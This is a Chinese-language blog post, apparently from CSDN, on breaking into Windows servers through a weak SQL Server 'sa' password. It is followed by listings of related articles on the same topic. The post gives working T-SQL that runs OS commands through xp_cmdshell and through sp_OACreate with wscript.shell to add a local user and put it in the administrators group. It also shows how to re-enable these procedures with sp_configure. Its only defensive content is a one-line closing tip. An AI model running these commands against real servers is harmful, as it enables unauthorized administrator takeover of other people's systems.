利用SA弱口令入侵windows服务器

最新推荐文章于 2021-07-29 14:58:45 发布
最新推荐文章于 2021-07-29 14:58:45 发布
阅读量2.7k 收藏 3
点赞数
文章标签: windows sqlserver 存储 xp 扩展 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/heng0413/article/details/6510797
版权

       利用SA弱口令入侵windows,其核心内容就是利用Microsoft SQLServer中的存储过程获得系统管理员权限。

MSSQL中存储过程分为三种,系统提供的存储过程,用户自定义的存储过程和扩展存储过程。

 

       系统提供的存储过程是在安装SQLServer时创建的存储过程,名字以"sp_"开头。用户定义的存储过程是用SQLServer的使用者编写的存储过程。扩展存储过程则是对动态链接库(DLL)函数的调用,主要是用于客户端与服务器端或客户端之间进行通信的,与一般动态链接库不同的是它们直接运行在SQLServer分配的内存地址内,其中危险性最高的扩展存储过程就xp_cmdshell了,它可以执行操作系统的任何指令。

    

       SAMicrosoft SQLServer的管理员帐号,拥有最高权限,它可以执行扩展存储过程,并获得返回值。如:

Code:
  1. USE master   
  2. GO   
  3.   
  4. exec xp_cmdshell 'net user test /add'   --添加用户名为test的受限用户   
  5.   
  6. exec xp_cmdshell 'net localgroup administrators test /add'  --提升test的用户权限为系统管理员
  7.   
  8. exec xp_cmdshell 'net user test /del'   --删除test用户  

        现在你应该明白为什么得到SA密码,就可以得到系统的最 高权限了吧。

 

        下面就详细讲解下MSSQL利用SA弱口令的攻击和防范。

        

        除了'xp_cmdshell'还有别的攻击方法么?当然有,在MSSQL中有一系列与OLE相关的存储过程,这一系列的存储过程同xp_cmdshell以及读取注册表系列的存储过程一样危险。这系列的存储过程有sp_OACreatesp_OADestroysp_OAGetErrorInfosp_OAGetPropertysp_OAMethod,sp_OASetPropertysp_OAStop   

Code:
  1. DECLARE @shell INT              --添加用户名为test的用户 如果目标操作系统为XP的话将winnt改为windows   
  2. EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null,'c:/windows/system32/cmd.exe /c net user test 123 /add'  
  3.   
  4. DECLARE @shell INT              --提升test的用户权限为系统管理员   
  5. EXEC SP_OACREATE 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null'c:/windows/system32/cmd.exe /c net localgroup administrators test /add'  

 

    先写这两种吧,呵呵估计心急的已经去测试了```但是似乎忘了告诉你,MSSQL在安装时xp_cmdshell 和ole相关的存储过程默认都是关闭的```。

    

Code:
  1. exec sp_configure 'show advanced options',1     --开启 show advanced options  1开启 0关闭   
  2. RECONFIGURE   
  3. GO   
  4.   
  5. --执行完语句后,RECONFIGURE是必须的···   
  6.   
  7. EXEC sp_configure 'xp_cmdshell', 1          --启用1 xp_cmdshell 0 禁用    
  8. RECONFIGURE   
  9. GO   
  10.   
  11. EXEC sp_configure 'Ole Automation Procedures', 1            --启用1 OLE相关的系统存储过程 0 禁用   
  12. RECONFIGURE   
  13. GO   
  14.   
  15.   
  16. --ok,自己的测试完了不要忘记关掉,顺便给SA设个强大的密码,最好是把SA直接禁用,知道怎么进攻了,就应该知道如何防守,哈哈  

 

 

 

heng0413
关注
4.公司网站被入侵——弱口令账号惹的祸
weixin_44023460的博客
01-02 368
4.1公司网站被入侵——弱口令账号惹的祸 一些公司公司其内部网络跟web服务器直接相连,虽然在出口做了安全限制,仅仅允许80端口对外进行连接,但如果提供web服务的站点存在安全隐患,通过渗透,获取webshell,通过webshell提权,通过代理程序直接穿透内网,进而控制整个域控和内网服务器,在本例中,通过暴力破解,成功获取其后台管理员弱口令,通过弱口令获取webshell,进而控制整个内网域控。 4.1.1获取webshell 1.暴力破解后台口令 通过burpsuite对该网站进行暴力破解,字典选用t
web入侵二之弱口令攻击及其他
热门推荐
jiangliuzheng的专栏
12-30 1万+
一、什么是弱口令   就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果   二、共享入侵--IPC$     IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可
入侵windows服务器的一种方法
12-19
项目中的一个工具类,可以实现通过命令行入侵服务器,首先必须先在服务器上运行myserver.exe,然后通过客户端来添加账号,设置权限,远程进入,删除帐号等来进行服务器入侵
通过MSSQL SA弱口令入侵服务器
04-17 276
话说前几天乌云爆了一个cms的漏洞 该漏洞可以直接打开网站后台的sql执行页面 从而入侵数据库 添加管理员用户 这样就得到服务器了 喵了个咪! 下面给大家介绍下 Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。网络中利用Microsoft SQLServe...
sa账户弱口令导致服务器被黑
东西山海关
01-03 241
记一次服务器被黑事件 这两天做安卓课设,需要用到数据库,于是就在服务器上使用Microsoft SQL Serve创建了一个数据库使用sa账户登录。 为了调试方便就将sa账户密码改成了123456,这就使黑客有了可乘之机。通过扫描1433端口,再配合sa账户,就可以轻而易举地拿到服务器的控制权。 故此,以后设置密码时一定不要图方便,而要重安全。 ...
MSSQL sa 弱口令提权基础知识学习
wjy397的专栏
06-29 3026
https://bbs.ichunqiu.com/thread-23312-1-1.html 1. “扩展存储过程”中的 xp_cmdshell Microsoft SQLServer是一个C/S模式的强大的关系型数据库管理系统,应用领域十分广泛,从网站后台数据库到一些MIS(管理信息系统)到处都可以看到它的身影。 网络安全中经常利用SqlServer SA
SA空口令入侵到3389终结完整编
chinawwc的专栏
05-15 4267
工具:WINNTAutoAttack自动攻击器(扫漏洞)SQLTOOLS(SA空口令连接器)RAMDIN影子3.0中文版(远程控制程序)RADMIN注册码:08US9A95I+lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA6A5KKZRHc5GVMIybWomK6rNwoj8mYy8LXRFi23SC.e
高效阴影sa弱口令扫描
11-23
首先,标题“高效阴影sa弱口令扫描”表明这是一种针对SQL Server数据库服务的弱口令检测工具,特别是针对SQL Server的默认管理员账号“sa”。这里的“sa”是System Administrator的缩写,是SQL Server安装后的默认...
服务器管理员账号sa,一次利用MSSQL的SA账户提权获取服务器权限
weixin_39542742的博客
07-29 990
遇到小人,把服务器整走了自己手里只有sql server的sa账号密码模糊记起之前用这个账户提权读取文件的事百度之,发现相关信息一堆堆各种工具也用了不少 发现不是语法错误就是权限不够无奈之下装了sql server r2直接来操作顺利连接上去,看到有master这个库。直奔重点去这里要用到的就是xp_cmdshell这个存储过程,算是mssql有sa权限下的提权利器,不过有经验的管理员一般都会用各...
通过sql弱口令入侵
08-31
- **定义**: SQL弱口令入侵是指攻击者利用数据库(如SQL Server)的弱密码漏洞,通过尝试各种常见或简单的登录凭证,从而非法访问并控制数据库系统的一种攻击手段。 - **危害**: 成功入侵后,攻击者可以读取敏感数据...
1433 SA弱口令入侵 XPCMDSHELL 恢复全攻略
01-31
把目前已知能够恢复1433 xpcmdshell master 全部SQL语句经过详细的整理后写成,虽然你下载的只是一个小小的TXT文件,但是里面包含着你现在非常需要,而且下载后会想永久保存的txt.资源分设高点为了防止过分滥传播!敬请谅解!小菜编译,老鸟请让步,谢谢!
超级弱口令检查工具
09-01
超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。 工具采用C#开发,需要安装.NET Framework 4.0,工具目前支持SSH、RDP、FTP、MySQL、SQLServer、Oracle、MongoDB、PostgreSQL、IMAP(支持SSL)、Memcached、Mongodb、POP3(支持SSL)、Redis、SMTP(支持SSL)、Telnet、VNC等服务的口令检查。
S-Xing弱口令扫描器核心功能源码
01-22
S-Xing弱口令扫描器好使,使用谁知道,现共享核心功能源码,愿世界充满爱,共同进步。
国外的windows密码获取工具
09-05
直接运行exe可获得命令 --output 路径+文件名可以导出数据。
超级弱口令检测工具
02-28
转自github大佬shack2,写的弱口令检测工具,超级弱口令检查工具是一款Windows平台的弱口令审计工具,支持批量多线程检查,可快速发现弱密码、弱口令账号,密码支持和用户名结合进行检查,大大提高成功率,支持自定义服务端口和字典。
sa弱口令强行入侵
H4iGe2的专栏
03-31 1001
我自己现在找肉鸡主要是找SA弱口令肉鸡到还能找到几只,但也碰到不少困难,到处查资料总算找到点有用的。下面这些命令要SQL分离器才能实现,下面是一些关于sa弱口令相关命令。注:具体问题具体分析,以上方法仅供参考,不一定有效,相关原理知识请自行查找。一.更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,新密码,sa(提示:慎用!
知道了sa密码,控制服务器
weixin_34279246的博客
09-11 128
一、增加用户aaa  exec   xp_cmdshell   'net   user aaa aaa   /add'   二、把aaa加入管理员组  exec   xp_cmdshell   'net   localgroup   administrators   aaa   /add'  三、远程桌面进行控制...
SA弱口令入侵中的相关命令
随风的专栏
01-17 336
一.更改sa口令方法:用sql综合利用工具连接后,执行命令:exec sp_password NULL,'新密码','sa'(提示:慎用!)二.简单修补sa弱口令.方法1:查询分离器连接后执行:if exists (select * from dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and OBJECTPROPERTY
MS SQL数据库SA权限入侵的感悟
wewaa的专栏
10-08 882
MS SQL数据库SA权限入侵的感悟2007-09-30 来自:xuejinyoulan推荐人评论想必大家都知道MSSQL中SA权限是什么,可以说是至高无上。今天我就它的危害再谈点儿,我所讲的是配合NBSI上传功能得到WebShell。 来源:网页教学网  想必大家都知道MSSQL中SA权限是什么,可以说是至高无上。今天我就它的危害再谈点儿,我所讲的是配合NBSI上传功能得到WebShell。在讲
数据库弱口令,账号密码:sa / sa的危害
最新发布
05-12
如果一个数据库的 sa(系统管理员)账号的密码非常弱,那么黑客可以使用该账号登录该数据库并执行各种操作,例如: 1. 篡改、删除或窃取敏感数据,如客户信用卡信息、用户密码等; 2. 添加新账户并授予管理员权限,使黑客可以随意访问和操作该数据库; 3. 更改数据库配置,例如启用远程访问、开启不安全的协议等,导致更多的安全漏洞; 4. 在系统上运行恶意代码,例如创建后门、植入恶意软件等。 因此,使用弱口令会给数据库带来严重的安全隐患,可能会导致数据泄露、系统瘫痪等重大后果。为了保障数据库的安全性,建议使用强口令,并定期更新密码。同时,也应该限制 sa 账号的访问权限,只给必要的人员授权,以最大程度地减少风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值